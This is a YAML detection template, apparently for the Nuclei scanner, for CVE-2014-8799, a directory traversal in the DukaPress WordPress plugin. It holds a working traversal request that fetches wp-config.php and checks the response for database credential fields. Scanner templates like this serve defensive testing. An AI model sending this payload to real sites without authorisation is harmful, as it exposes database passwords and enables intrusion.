37 lines
1.0 KiB
YAML
37 lines
1.0 KiB
YAML
id: CVE-2014-8799
|
|
|
|
info:
|
|
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-8799
|
|
- https://www.exploit-db.com/exploits/35346
|
|
- https://www.cvedetails.com/cve/CVE-2014-8799
|
|
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
|
classification:
|
|
cve-id: CVE-2014-8799
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "DB_NAME"
|
|
- "DB_PASSWORD"
|
|
- "DB_USER"
|
|
- "DB_HOST"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/02/25
|